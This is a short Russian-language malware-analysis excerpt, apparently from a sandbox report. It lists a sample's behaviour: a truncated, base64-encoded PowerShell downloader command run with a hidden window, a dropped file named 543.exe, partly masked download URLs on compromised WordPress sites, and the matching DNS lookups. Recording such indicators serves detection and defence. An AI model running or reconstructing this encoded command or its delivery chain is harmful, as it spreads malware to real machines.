Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9AC...
- %HOMEPATH%\543.exe
- %HOMEPATH%\543.exe
- 'cs####ldersllc.com':443
- http://el###sstore.com/css/qpfv_e_y3lk0sp6i/
- http://lu###me247.com/wp-admin/qawpw_v1_ghe1wmzxzc/
- http://va####ebuilders.com/wp-admin/e2ky_18j8_wn4v/
- http://cs####ldersllc.com/wp-admin/teqvm_n0yai_84/
- DNS ASK el###sstore.com
- DNS ASK lu###me247.com
- DNS ASK va####ebuilders.com
- DNS ASK de#####ngveterans.com
- DNS ASK cs####ldersllc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9AC...' (со скрытым окном)